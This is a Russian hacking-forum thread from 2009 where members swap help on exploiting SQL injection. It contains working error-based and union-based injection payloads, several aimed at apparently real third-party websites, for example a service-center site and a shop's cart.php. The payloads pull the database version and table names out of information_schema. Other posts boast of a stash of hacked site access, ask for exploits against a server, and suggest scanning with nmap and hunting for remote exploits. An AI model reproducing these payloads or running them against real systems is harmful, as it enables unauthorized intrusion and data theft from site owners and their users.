Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://acp.svn.beanstalkapp.com/projects/ACP2/modules/charedit.php

    PHP:
    if ($_POST['character'] >= 0) {
      
    $c_connect mysql_connect($c_ip$c_userdb$c_pw);
      
    mysql_select_db($c_db$c_connect);
      
    mysql_query("SET NAMES '$encoding'");  
      
    $res mysql_query("SELECT `name`, `class`, `guid`, `race`, `online`, `gender`, `level`, `money`, `xp` FROM `characters` WHERE (`guid` = ".$_POST['character'].") and (`account` = ".$_SESSION['user_id'].") and (`online` = 0) LIMIT 1") or trigger_error(mysql_error());
    Вот здесь $_POST['character']

    character=12589)+and+1=(select+*+from(select+*+from(select+name_const((version()),14)d)+as+t+join+(select+name_const((version()),14)e)b)a)--+

     
    6 people like this.
  2. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс большое очень помогло.
    при запросе
    PHP:
    (%53elect+top+1+Post_count+from+Total)--
    всегда ответ одинаковый
    ADODB.Field error '800a0bcd'

    Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
    где может быть ошибка
     
    #10862 YuNi|[c, 28 Dec 2009
    Last edited: 28 Dec 2009
  3. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    это что за ужас? так низя
    я прсмотрел сайт по-моему там врядли гдето можно внедрить инъекцию. может кто поопытнее что-то найдет
    в гугле набери: inurl:index.php?id=1 и подставляй в каждой ссылке кавычку для тренировки
     
  4. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Ну если не знаешь, то зачем писать?
    Для тренировки я использую методы по интересней :) А вообще то у меня уже свалка доступа к сайтам с посещаемостью не 1к уников в сутки))
    Просто вопросы я чаще всего решаю сам, чем пишу на форуме, а крутить простые скули типа как ты говоришь inurl:index.php?id=1, не очень интересно.
    зы. Для меня интерес в выведении допустим того же database(), а не сидеть перебирать таблички и смотреть что в них. Перебирать таблички уже с построенного запроса, это вообще практически ничему не учит. Так что, вот так вот :)

    Вот же допустим выводиться..
    http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1+1='2/

    Почему же не выводиться допустим когда вставляем version или другую подобную функцию.
    http://www.dr service.ru/service-centers/nn/NNovgorod/drservice52/'and+substr ing(version(),1,1)='5/

    Видимо потому что 6 утра и нужно спать)) Бо что-то уже совсем ничего не выводиться )))
     
    #10864 v1d0qz, 29 Dec 2009
    Last edited: 29 Dec 2009
  5. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    да не хрена там не выводится и не будет т.к это бред то что ты пишешь.
    читай http://forum.antichat.ru/thread19844.html
     
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    v1d0qz
    http://www.drservice.ru/service-centers/nn/NNovgorod/drservice52/'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)--'
     
    2 people like this.
  7. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    1 person likes this.
  8. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    сорри но там нету решение как в\обойти если не выводится инфо с колонок
    пример:
    (%53elect+top+1+Post_count+from+Total)--

    всегда ответ одинаковый
    ADODB.Field error '800a0bcd'

    Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
     
  9. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    YuNi|[c, там в целом речь о MySQL.
     
  10. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    jokester
    Так и знал что там можно всё через дупликат красиво оформить.

    Ой сорри, было очень поздно, на втыке написал)
    там должно было быть
    http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1='2/
    Вы главное не нервничайте, всё будет хорошо ;)
     
    #10870 v1d0qz, 29 Dec 2009
    Last edited: 18 Apr 2010
  11. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Не могу раскрутить скуль

    https://hiphop-dojo.com/order/cart.php?id=939'
     
  12. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    https://hiphop-dojo.com/order/cart.php?id=939'+and+1=(select+*+from(select+*+from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),14)d)+as+t+join+(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),14)e)b)a)--+
     
    2 people like this.
  13. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    https://hiphop-dojo.com/order/cart.php?id=-939'+union+select+1,2,3,version(),5,6,7,8,9,10+--+
     
    1 person likes this.
  14. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Есть такой сервер: Apache/2.2.2 (ASPLinux) PHP/5.1.2
    Не буду вдаваться в заумные слова. Есть ли хорошие дыры в этой вещи? Нормальный сплойтов не нашел(
     
  15. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    ты еще в openssh дыры поищи...
     
  16. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Не я серьезно. Нужно позарез. Нашел порт, где "возможно" удаленно выполнение команд ssh, и на подбор пароля к ssh2.
    PS "Возможно" в кавычках не зря((
     
  17. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    а что значит "Нашел порт, где "возможно" удаленно выполнение команд ssh"
    это как?
     
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    по всей видимости нашел там "возможности" какой нибудь сканер...
     
    1 person likes this.
  19. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    Да, сканер. Скажите беспонтово лезть на этот сервак? Это локальный сервер, не сайт.
     
  20. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    просканируй сервак nmap-ом и ищи в гугле какой нить remote exploit!
     
Thread Status:
Not open for further replies.